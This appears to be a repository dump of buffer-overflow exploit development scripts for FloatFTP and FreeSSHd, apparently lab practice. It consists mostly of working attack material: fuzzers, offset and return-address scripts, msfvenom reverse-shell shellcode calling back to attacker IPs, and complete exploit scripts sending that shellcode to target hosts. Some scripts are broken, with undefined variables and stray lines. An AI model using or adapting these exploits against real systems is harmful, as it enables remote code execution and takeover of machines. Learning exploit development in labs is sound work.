"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" 6 | end_buff=" HTTP/1.1\r\n\r\n" 7 | final_buff = pre_buff+buff+end_buff 8 | sock.send(final_buff) 9 | sock.recv(1024) 10 | sock.close() 11 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/@old/ty.py: -------------------------------------------------------------------------------- 1 | 2 | import socket 3 | 4 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 5 | 6 | buff = "A"*247 + "\x03\xb5\x56\x76"+"\x90"*366 7 | try: 8 | print "\nSending evil buffer..." 9 | s.connect(('192.168.1.116', 21)) 10 | s.send('GET ' + buffer + '\r\n\r\n') 11 | print s.recv(1024) 12 | s.close() 13 | print "\nDone!" 14 | except: 15 | print "Could not connect" 16 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | eob="\r\n\r\n" 5 | 6 | Shellcode = "A" * 248 +"B" * 4 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',21)) 10 | print "Sending data to remove server....." 11 | s.send(('GET' + Shellcode + eob)) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | 6 | exploit=("\xbd\x73\xb5\x8d\xec\xda\xc8\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" 7 | "\x52\x31\x6e\x12\x03\x6e\x12\x83\x9d\x49\x6f\x19\x9d\x5a\xf2" 8 | "\xe2\x5d\x9b\x93\x6b\xb8\xaa\x93\x08\xc9\x9d\x23\x5a\x9f\x11" 9 | "\xcf\x0e\x0b\xa1\xbd\x86\x3c\x02\x0b\xf1\x73\x93\x20\xc1\x12" 10 | "\x17\x3b\x16\xf4\x26\xf4\x6b\xf5\x6f\xe9\x86\xa7\x38\x65\x34" 11 | "\x57\x4c\x33\x85\xdc\x1e\xd5\x8d\x01\xd6\xd4\xbc\x94\x6c\x8f" 12 | "\x1e\x17\xa0\xbb\x16\x0f\xa5\x86\xe1\xa4\x1d\x7c\xf0\x6c\x6c" 13 | "\x7d\x5f\x51\x40\x8c\xa1\x96\x67\x6f\xd4\xee\x9b\x12\xef\x35" 14 | "\xe1\xc8\x7a\xad\x41\x9a\xdd\x09\x73\x4f\xbb\xda\x7f\x24\xcf" 15 | "\x84\x63\xbb\x1c\xbf\x98\x30\xa3\x6f\x29\x02\x80\xab\x71\xd0" 16 | "\xa9\xea\xdf\xb7\xd6\xec\xbf\x68\x73\x67\x2d\x7c\x0e\x2a\x3a" 17 | "\xb1\x23\xd4\xba\xdd\x34\xa7\x88\x42\xef\x2f\xa1\x0b\x29\xa8" 18 | "\xc6\x21\x8d\x26\x39\xca\xee\x6f\xfe\x9e\xbe\x07\xd7\x9e\x54" 19 | "\xd7\xd8\x4a\xfa\x87\x76\x25\xbb\x77\x37\x95\x53\x9d\xb8\xca" 20 | "\x44\x9e\x12\x63\xee\x65\xf5\x4c\x47\x64\x96\x25\x9a\x66\x9c" 21 | "\x67\x13\x80\xf6\x97\x72\x1b\x6f\x01\xdf\xd7\x0e\xce\xf5\x92" 22 | "\x11\x44\xfa\x63\xdf\xad\x77\x77\x88\x5d\xc2\x25\x1f\x61\xf8" 23 | "\x41\xc3\xf0\x67\x91\x8a\xe8\x3f\xc6\xdb\xdf\x49\x82\xf1\x46" 24 | "\xe0\xb0\x0b\x1e\xcb\x70\xd0\xe3\xd2\x79\x95\x58\xf1\x69\x63" 25 | "\x60\xbd\xdd\x3b\x37\x6b\x8b\xfd\xe1\xdd\x65\x54\x5d\xb4\xe1" 26 | "\x21\xad\x07\x77\x2e\xf8\xf1\x97\x9f\x55\x44\xa8\x10\x32\x40" 27 | "\xd1\x4c\xa2\xaf\x08\xd5\xc2\x4d\x98\x20\x6b\xc8\x49\x89\xf6" 28 | "\xeb\xa4\xce\x0e\x68\x4c\xaf\xf4\x70\x25\xaa\xb1\x36\xd6\xc6" 29 | "\xaa\xd2\xd8\x75\xca\xf6") 30 | 31 | eob="\r\n\r\n" 32 | Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',21)) 37 | print "Sending data to remove server....." 38 | s.send(('GET' + Shellcode + eob)) 39 | s.close() 40 | 41 | 42 | 43 | except: 44 | print("Error in connecting") 45 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | eob="\r\n\r\n" 14 | Shellcode = "A" * 248 +"B" * 4 + badchars 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',21)) 19 | print "Sending data to remove server....." 20 | s.send(('GET' + Shellcode + eob)) 21 | s.close() 22 | 23 | 24 | 25 | except: 26 | print("Error in connecting") 27 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | eob="\r\n\r\n" 6 | 7 | while True: 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',21)) 11 | print "Trying with buffer length %d" % len(buffer) 12 | s.send(('GET' + buffer + eob)) 13 | s.close() 14 | sleep(1) 15 | buffer=buffer + "A"*100 16 | 17 | 18 | except: 19 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 20 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | eob="\r\n\r\n" 5 | 6 | Shellcode = "A" * 248 +"B" * 4 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',21)) 10 | print "Sending data to remove server....." 11 | s.send(('GET' + offset + eob)) 12 | s.close() 13 | 14 | 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log data, item 8 15 | Address=625011D3 16 | Message= 0x625011d3 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 17 | 18 | Log data, item 7 19 | Address=625011DF 20 | Message= 0x625011df : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 21 | 22 | Log data, item 6 23 | Address=625011EB 24 | Message= 0x625011eb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 25 | 26 | Log data, item 5 27 | Address=625011F7 28 | Message= 0x625011f7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 29 | 30 | Log data, item 4 31 | Address=62501203 32 | Message= 0x62501203 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Log data, item 3 35 | Address=62501205 36 | Message= 0x62501205 : "\xff\xe4" | ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 37 | 38 | -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>760B4B21" 5 | 6 | eob="\r\n\r\n" 7 | Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',21)) 11 | print "Sending data to remove server....." 12 | s.send(('GET' + Shellcode + eob)) 13 | s.close() 14 | 15 | 16 | 17 | except: 18 | print("Error in connecting") 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/FLoatFTP/writewup: -------------------------------------------------------------------------------- 1 | Service ="FloatFTP" 2 | PORT = 21 /FTP (Anynoymous login) 3 | 4 | 5 | 1.Fuzzing and findinf bugger size 500 6 | 2. find offset via sending random string of 500 7 | 8 | EIP= > 33694132 buffer size 248 9 | 10 | 3. bad character => "\x00\x0a\x0d" 11 | 12 | 4. return addrress !mona find -s "\xff\xe4" -m shell32.dll 13 | 14 | 5. Exploit Shellcode = "A" * 248 + "\x21\x4b\x0b\x76" + "\x90" *32 +exploi -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 | 10 | 11 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 12 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 13 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 14 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 15 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 16 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 17 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 18 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 19 | 20 | buffer = "A" * 1055 + "B" * 4 + badchars 21 | 22 | buffer += "C" * (20400-len(buffer)) 23 | 24 | 25 | eob = "\r\n" 26 | 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect(('192.168.43.156',22)) 31 | print "Sending paylaod to remote server....." 32 | s.send((Pre + buffer + eob)) 33 | s.recv(1024) 34 | s.close() 35 | 36 | except: 37 | print("unable to connect remoter server....") 38 | sys.exit() 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | #77D2BC93 5 | 6 | 7 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 8 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 9 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 10 | 11 | buffer = "A" * 1055 + "\x93\xbc\xd2\x77" 12 | 13 | buffer += "C" * (20400-len(buffer)) 14 | 15 | eob = "\r\n" 16 | 17 | 18 | try: 19 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 20 | s.connect(('192.168.43.156',22)) 21 | print "Sending paylaod to remote server....." 22 | s.send((Pre + buffer + eob)) 23 | s.recv(1024) 24 | s.close() 25 | 26 | except: 27 | print("unable to connect remoter server....") 28 | sys.exit() 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | from time import sleep 5 | 6 | 7 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 8 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 9 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 10 | 11 | buffer = "A" * 100 12 | 13 | eob = "\r\n" 14 | 15 | 16 | while True: 17 | try: 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 19 | s.connect(('192.168.43.156',22)) 20 | print "Trying with buffer length %d" % len(buffer) 21 | s.send((Pre + buffer + eob)) 22 | s.recv(1024) 23 | s.close() 24 | 25 | buffer=buffer + "A"*100 26 | 27 | 28 | except: 29 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 30 | sys.exit() 31 | sock.send(Final ) 32 | 33 | time.sleep(5) 34 | 35 | sock.close() 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 | 10 | buffer = "A" * 1055 + "B" * 4 11 | 12 | buffer += "C" * (20400-len(buffer)) 13 | 14 | eob = "\r\n" 15 | 16 | 17 | try: 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 19 | s.connect(('192.168.43.156',22)) 20 | print "Sending paylaod to remote server....." 21 | s.send((Pre + buffer + eob)) 22 | s.recv(1024) 23 | s.close() 24 | 25 | except: 26 | print("unable to connect remoter server....") 27 | sys.exit() 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/shell.txt: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.43.223 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | 12 | 13 | "\xbf\x8d\x4f\x71\xef\xda\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" 14 | "\x52\x31\x7b\x12\x03\x7b\x12\x83\x66\xb3\x93\x1a\x84\xa4\xd6" 15 | "\xe5\x74\x35\xb7\x6c\x91\x04\xf7\x0b\xd2\x37\xc7\x58\xb6\xbb" 16 | "\xac\x0d\x22\x4f\xc0\x99\x45\xf8\x6f\xfc\x68\xf9\xdc\x3c\xeb" 17 | "\x79\x1f\x11\xcb\x40\xd0\x64\x0a\x84\x0d\x84\x5e\x5d\x59\x3b" 18 | "\x4e\xea\x17\x80\xe5\xa0\xb6\x80\x1a\x70\xb8\xa1\x8d\x0a\xe3" 19 | "\x61\x2c\xde\x9f\x2b\x36\x03\xa5\xe2\xcd\xf7\x51\xf5\x07\xc6" 20 | "\x9a\x5a\x66\xe6\x68\xa2\xaf\xc1\x92\xd1\xd9\x31\x2e\xe2\x1e" 21 | "\x4b\xf4\x67\x84\xeb\x7f\xdf\x60\x0d\x53\x86\xe3\x01\x18\xcc" 22 | "\xab\x05\x9f\x01\xc0\x32\x14\xa4\x06\xb3\x6e\x83\x82\x9f\x35" 23 | "\xaa\x93\x45\x9b\xd3\xc3\x25\x44\x76\x88\xc8\x91\x0b\xd3\x84" 24 | "\x56\x26\xeb\x54\xf1\x31\x98\x66\x5e\xea\x36\xcb\x17\x34\xc1" 25 | "\x2c\x02\x80\x5d\xd3\xad\xf1\x74\x10\xf9\xa1\xee\xb1\x82\x29" 26 | "\xee\x3e\x57\xfd\xbe\x90\x08\xbe\x6e\x51\xf9\x56\x64\x5e\x26" 27 | "\x46\x87\xb4\x4f\xed\x72\x5f\xb0\x5a\x57\x40\x58\x99\xa7\x7a" 28 | "\x4b\x14\x41\xe8\x7b\x71\xda\x85\xe2\xd8\x90\x34\xea\xf6\xdd" 29 | "\x77\x60\xf5\x22\x39\x81\x70\x30\xae\x61\xcf\x6a\x79\x7d\xe5" 30 | "\x02\xe5\xec\x62\xd2\x60\x0d\x3d\x85\x25\xe3\x34\x43\xd8\x5a" 31 | "\xef\x71\x21\x3a\xc8\x31\xfe\xff\xd7\xb8\x73\xbb\xf3\xaa\x4d" 32 | "\x44\xb8\x9e\x01\x13\x16\x48\xe4\xcd\xd8\x22\xbe\xa2\xb2\xa2" 33 | "\x47\x89\x04\xb4\x47\xc4\xf2\x58\xf9\xb1\x42\x67\x36\x56\x43" 34 | "\x10\x2a\xc6\xac\xcb\xee\xe6\x4e\xd9\x1a\x8f\xd6\x88\xa6\xd2" 35 | "\xe8\x67\xe4\xea\x6a\x8d\x95\x08\x72\xe4\x90\x55\x34\x15\xe9" 36 | "\xc6\xd1\x19\x5e\xe6\xf3" -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys, socket 4 | 5 | 6 | Pre= ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 7 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 8 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 9 | 10 | 11 | Shellcode=("\xbf\x8d\x4f\x71\xef\xda\xc5\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" 12 | "\x52\x31\x7b\x12\x03\x7b\x12\x83\x66\xb3\x93\x1a\x84\xa4\xd6" 13 | "\xe5\x74\x35\xb7\x6c\x91\x04\xf7\x0b\xd2\x37\xc7\x58\xb6\xbb" 14 | "\xac\x0d\x22\x4f\xc0\x99\x45\xf8\x6f\xfc\x68\xf9\xdc\x3c\xeb" 15 | "\x79\x1f\x11\xcb\x40\xd0\x64\x0a\x84\x0d\x84\x5e\x5d\x59\x3b" 16 | "\x4e\xea\x17\x80\xe5\xa0\xb6\x80\x1a\x70\xb8\xa1\x8d\x0a\xe3" 17 | "\x61\x2c\xde\x9f\x2b\x36\x03\xa5\xe2\xcd\xf7\x51\xf5\x07\xc6" 18 | "\x9a\x5a\x66\xe6\x68\xa2\xaf\xc1\x92\xd1\xd9\x31\x2e\xe2\x1e" 19 | "\x4b\xf4\x67\x84\xeb\x7f\xdf\x60\x0d\x53\x86\xe3\x01\x18\xcc" 20 | "\xab\x05\x9f\x01\xc0\x32\x14\xa4\x06\xb3\x6e\x83\x82\x9f\x35" 21 | "\xaa\x93\x45\x9b\xd3\xc3\x25\x44\x76\x88\xc8\x91\x0b\xd3\x84" 22 | "\x56\x26\xeb\x54\xf1\x31\x98\x66\x5e\xea\x36\xcb\x17\x34\xc1" 23 | "\x2c\x02\x80\x5d\xd3\xad\xf1\x74\x10\xf9\xa1\xee\xb1\x82\x29" 24 | "\xee\x3e\x57\xfd\xbe\x90\x08\xbe\x6e\x51\xf9\x56\x64\x5e\x26" 25 | "\x46\x87\xb4\x4f\xed\x72\x5f\xb0\x5a\x57\x40\x58\x99\xa7\x7a" 26 | "\x4b\x14\x41\xe8\x7b\x71\xda\x85\xe2\xd8\x90\x34\xea\xf6\xdd" 27 | "\x77\x60\xf5\x22\x39\x81\x70\x30\xae\x61\xcf\x6a\x79\x7d\xe5" 28 | "\x02\xe5\xec\x62\xd2\x60\x0d\x3d\x85\x25\xe3\x34\x43\xd8\x5a" 29 | "\xef\x71\x21\x3a\xc8\x31\xfe\xff\xd7\xb8\x73\xbb\xf3\xaa\x4d" 30 | "\x44\xb8\x9e\x01\x13\x16\x48\xe4\xcd\xd8\x22\xbe\xa2\xb2\xa2" 31 | "\x47\x89\x04\xb4\x47\xc4\xf2\x58\xf9\xb1\x42\x67\x36\x56\x43" 32 | "\x10\x2a\xc6\xac\xcb\xee\xe6\x4e\xd9\x1a\x8f\xd6\x88\xa6\xd2" 33 | "\xe8\x67\xe4\xea\x6a\x8d\x95\x08\x72\xe4\x90\x55\x34\x15\xe9" 34 | "\xc6\xd1\x19\x5e\xe6\xf3") 35 | 36 | buffer = "A" * 1055 + "\x93\xbc\xd2\x77"+ "\x90" * 25 + Shellcode 37 | 38 | buffer += "C" * (20400-len(buffer)) 39 | 40 | 41 | eob = "\r\n" 42 | 43 | 44 | try: 45 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 46 | s.connect(('192.168.43.156',22)) 47 | print "Sending paylaod to remote server....." 48 | s.send((Pre + buffer + eob)) 49 | s.recv(1024) 50 | s.close() 51 | 52 | except: 53 | print("unable to connect remoter server....") 54 